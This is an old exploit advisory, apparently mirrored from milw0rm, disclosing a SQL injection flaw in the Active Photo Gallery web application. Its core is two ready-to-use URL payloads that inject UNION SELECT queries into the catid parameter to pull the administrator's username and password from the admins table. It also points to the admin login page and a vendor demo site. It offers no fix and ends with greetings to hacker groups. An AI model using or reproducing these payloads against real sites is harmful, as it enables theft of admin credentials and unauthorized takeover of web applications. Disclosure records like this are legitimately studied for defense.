Active Photo Gallery Remote SQL Injection Vulnerability

2007-03-25T00:00:00
ID SECURITYVULNS:DOC:16473
Type securityvulns
Reporter Securityvulns
Modified 2007-03-25T00:00:00

Description

Title : Active Photo Gallery Remote SQL Injection Vulnerability

Author : CyberGhost

My Web Site : http://aspspider.org/cgsecurity

Demo Page : http://www.activewebsoftwares.com/demoactivephotogallery

Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=11

Vuln.

Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1

Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1

Admin Login : /admin.asp

====================================

Thanx : redLine - Hackinger - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

milw0rm.com [2007-03-21]